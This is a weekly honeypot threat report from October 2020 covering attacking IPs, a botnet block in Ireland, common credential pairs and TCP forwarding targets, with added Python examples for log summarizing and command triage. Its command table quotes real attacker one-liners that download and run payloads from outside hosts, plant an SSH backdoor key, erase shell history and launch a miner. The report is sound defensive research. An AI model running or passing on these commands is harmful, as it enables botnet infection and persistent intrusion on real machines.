Honey Pot – Previous Week 18 October 2020.

Analyzing the honeypot output from the previous week, we detected 319 unique IPs hitting the server from 39 different countries, using a combined 12,534 different username/password combos.

Total attacking IPs: 319
Total Countries: 39
Total User/pass successful combos: 12534
Total Commands run: 66
Total TCP Forward requests: 16073

Reviewing the top 30 IPs, we can see the use of a botnet (5.188.86.xx). This botnet is located in Ireland at Global Layer BV.

geoiplookup 5.188.86.164
GeoIP Country Edition: IE, Ireland
GeoIP City Edition, Rev 1: IE, 04, Cork, Macroom, P12, 51.900002, -8.950000, 0, 0
GeoIP ASNum Edition: AS49453 Global Layer B.V.

This botnet accounts for 1/3 of the top 30 IPs hitting the honeypot.
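As an added example (not code from the original post), this is how the weekly tables above, the TCP forwarding table further down, and the /24 clustering that exposes a block like 5.188.86.xx can be produced from a honeypot's JSON event log. It assumes a Cowrie-style log (eventid, src_ip, username, password, input, dst_ip, dst_port are assumed field names) and runs on constructed sample records.

```python
import json
from collections import Counter
from ipaddress import ip_network

# Constructed records in Cowrie's JSON log shape; sample data, not the real
# honeypot log, and the eventid/field names are an assumption about Cowrie.
def _ev(kind, ip, **fields):
    return json.dumps({"eventid": kind, "src_ip": ip, **fields})

SAMPLE_LOG = "\n".join([
    _ev("cowrie.session.connect", "185.111.76.2"),
    _ev("cowrie.session.connect", "185.111.76.2"),
    _ev("cowrie.session.connect", "5.188.86.164"),
    _ev("cowrie.session.connect", "5.188.86.168"),
    _ev("cowrie.login.success", "185.111.76.2", username="root", password="admin"),
    _ev("cowrie.login.success", "5.188.86.164", username="root", password="admin"),
    _ev("cowrie.command.input", "185.111.76.2", input='echo -e "\\x6F\\x6B"'),
    _ev("cowrie.command.input", "5.188.86.164", input="nproc"),
    _ev("cowrie.direct-tcpip.request", "185.111.76.2", dst_ip="ya.ru", dst_port=80),
    _ev("cowrie.direct-tcpip.request", "185.111.76.2", dst_ip="ya.ru", dst_port=80),
    _ev("cowrie.direct-tcpip.request", "5.188.86.164", dst_ip="m.youtube.com", dst_port=443),
])

def summarize(log_text):
    """Per-week tables: connects per source IP, credential pairs, commands, TCP forwards."""
    ips, creds, cmds, fwds = Counter(), Counter(), Counter(), Counter()
    for line in filter(None, log_text.splitlines()):
        ev = json.loads(line)
        kind = ev.get("eventid")
        if kind == "cowrie.session.connect":
            ips[ev["src_ip"]] += 1
        elif kind == "cowrie.login.success":
            creds[f'{ev["username"]}/{ev["password"]}'] += 1
        elif kind == "cowrie.command.input":
            cmds[ev["input"]] += 1
        elif kind == "cowrie.direct-tcpip.request":
            fwds[f'{ev["dst_ip"]}:{ev["dst_port"]}'] += 1
    return {"ips": ips, "creds": creds, "commands": cmds, "forwards": fwds}

def cluster_by_prefix(ip_counter, prefixlen=24):
    """Group sources into /prefixlen blocks; many distinct hosts plus a large share
    of hits in one block is the botnet pattern the report calls 5.188.86.xx."""
    blocks = {}
    for ip, hits in ip_counter.items():
        net = str(ip_network(f"{ip}/{prefixlen}", strict=False))
        entry = blocks.setdefault(net, {"hosts": 0, "hits": 0})
        entry["hosts"] += 1
        entry["hits"] += hits
    return sorted(blocks.items(), key=lambda kv: (kv[1]["hits"], kv[1]["hosts"]), reverse=True)
```

`summarize(SAMPLE_LOG)["ips"].most_common(30)` gives the top-30 table; `cluster_by_prefix` on the same counter ranks the /24 blocks behind it.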

TOP 30 Attacking IPs


The countries attacking the honeypot are diverse. The most IPs come from the United States, followed by Russia; the Irish botnet mentioned above puts Ireland at rank 4.

Countries of Origin

81 United States
40 Russia
38 China
18 Ireland
16 Germany
16 Netherlands
10 Panama
9 Republic of Lithuania
7 France
7 India
7 South Korea
5 Hong Kong
5 United Kingdom
5 Sweden
5 Vietnam
4 Canada
4 Romania
4 Taiwan
4 Japan
4 Ukraine
4 Indonesia
3 Australia
3 Brazil
2 Italy
2 Colombia
2 Argentina
1 Latvia
1 None
1 Sri Lanka
1 Malaysia

There are no limits to what password combos can be used. The most popular is root/admin with a whopping 107,767 logins.

Username and password combos

107767 root/admin
183 root/1234
53 root/root
52 root/123456
50 root/merlin
43 root/password
33 root/marketing
32 root/12345678
29 root/123
27 root/123456789

This is my favorite part of the report: seeing what people are trying to run. It is a great way to harvest malicious scripts for further analysis. The most popular command is echo -e "\x6F\x6B", which prints OK.

TOP 30 Commands

11910 echo -e "\x6F\x6B"
353 nproc
319 uname -s -v -n -r
135 uname -a;php -v;
107 uname -a
102 uname -a;nproc
78 uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys
71 cat /etc/issue
60 wget http://185.132.53.14/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.* ; history -c
40 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c
34 nc 1 1; rm s.sh; wget http://45.148.10.186/s.sh; busybox wget http://45.148.10.186/s.sh; curl -O http://45.148.10.186/s.sh; chmod 777 *; sh s.sh;
29 nc 1 1;cat /etc/issue; wget https://nasapaul.com/cnrig; ./cnrig;
18 cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.115/hentai.sh; curl -O http://194.180.224.115/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh ;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.123/pwnInfect.sh; curl -O http://193.228.91.123/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.123 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.123; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
18 cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.115/hentai.sh; curl -O http://194.180.224.115/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh ; rm -rf *
16 cd /tmp; wget http://107.173.122.103/x86; chmod 777 x86; ./x86 Rooted; rm -rf *
12 cd /tmp || cd /run || cd /; wget http://185.132.53.124/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 185.132.53.124 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 185.132.53.124; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
12 ls -la
5 cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.132.53.225/dayum0x1a5sfd15as1fa.sh; cat dayum0x1a5sfd15as1fa.sh > sssoggrf; chmod +x sssoggrf; ./sssoggrf; history -c
4 cd /tmp; wget http://194.87.138.97/bins/hoho.x86; chmod 777 ; ./hoho.x86 gift from Magisk#6297
4 /usr/bin/tar Pxvf -
3
2 /ip cloud print
2 ifconfig
2 cat /proc/cpuinfo
2 ps | grep '[Mm]iner'
2 ps -ef | grep '[Mm]iner'
2 ls -la /dev/ttyGSM /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
2 echo Hi | cat -n
2 cd
2 cd /
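As an added example (not code from the original post), a small triage script for the harvested command lines: it tags each one by behaviour (recon, download, execute, persistence, anti-forensics, cleanup, the echo liveness probe) and extracts the payload URLs and TFTP/FTP hosts worth pulling into a sandbox for the further analysis mentioned above. The sample commands are constructed from the shapes in the table, with RFC 5737 placeholder hosts in place of the real payload servers.

```python
import re

# Constructed attacker command lines modelled on the shapes in the table above;
# hosts are RFC 5737 placeholders (192.0.2.x), not the real payload servers.
SAMPLE_COMMANDS = [
    'echo -e "\\x6F\\x6B"',
    "uname -a;nproc",
    "cd /tmp || cd /var/run || cd /; wget http://192.0.2.10/bins/payload.x86; "
    "chmod 777 payload.x86; ./payload.x86 roots; rm -rf payload.*; history -c",
    "unset HISTFILE;export HISTFILE=/dev/null;cd;mkdir .ssh;"
    "echo 'ssh-rsa AAAA...CONSTRUCTED' >> .ssh/authorized_keys",
    "cat /etc/issue; tftp 192.0.2.20 -c get stage2.sh; "
    "curl -O http://192.0.2.20/stage2.sh; sh stage2.sh",
]

# Behaviour tags a defender pivots on, reported in this order.
RULES = [
    ("liveness_probe", re.compile(r'^echo -e "\\x6F\\x6B"$')),
    ("recon", re.compile(r"\b(uname|nproc|cat /etc/issue|cat /proc/cpuinfo|ifconfig|ls -la)\b")),
    ("download", re.compile(r"\b(wget|curl|tftp|ftpget)\b")),
    ("execute", re.compile(r"chmod (\+x|777)|\./[\w.]+|\bsh \S+\.sh")),
    ("persistence", re.compile(r"authorized_keys|\.ssh/")),
    ("anti_forensics", re.compile(r"history -c|HISTFILE|HISTSIZE=0|unset HIST")),
    ("cleanup", re.compile(r"rm -rf")),
]
URL_RE = re.compile(r"https?://[^\s;'\"]+")
# tftp/ftpget fetches name the server as a bare IP rather than a URL.
TFTP_HOST_RE = re.compile(r"\b(?:tftp|ftpget)\b[^;|&]*?(\d{1,3}(?:\.\d{1,3}){3})")

def triage(cmd):
    """Tag one command line and pull out the payload sources worth fetching
    (in a sandbox) for further analysis."""
    tags = [name for name, rx in RULES if rx.search(cmd)]
    sources = URL_RE.findall(cmd) + TFTP_HOST_RE.findall(cmd)
    return {"tags": tags, "sources": list(dict.fromkeys(sources))}

def stage_two_hosts(commands):
    """Distinct payload hosts across a week's commands: the pivot/blocklist set."""
    hosts = set()
    for cmd in commands:
        for src in triage(cmd)["sources"]:
            hosts.add(src.split("//")[-1].split("/")[0])
    return sorted(hosts)

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(triage(cmd))
    print("payload hosts:", stage_two_hosts(SAMPLE_COMMANDS))
```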

TOP 30 TCP Forwarding

Of the TCP forwarding requests, a whopping 77,679 went to ya.ru (Yandex.ru) on port 80, followed by 12,661 requests to m.youtube.com on port 443.


For as long as the honeypot has been running, the botnet from Ireland has always been in the picture. The ranking of countries changes week to week, as does the type of command being run.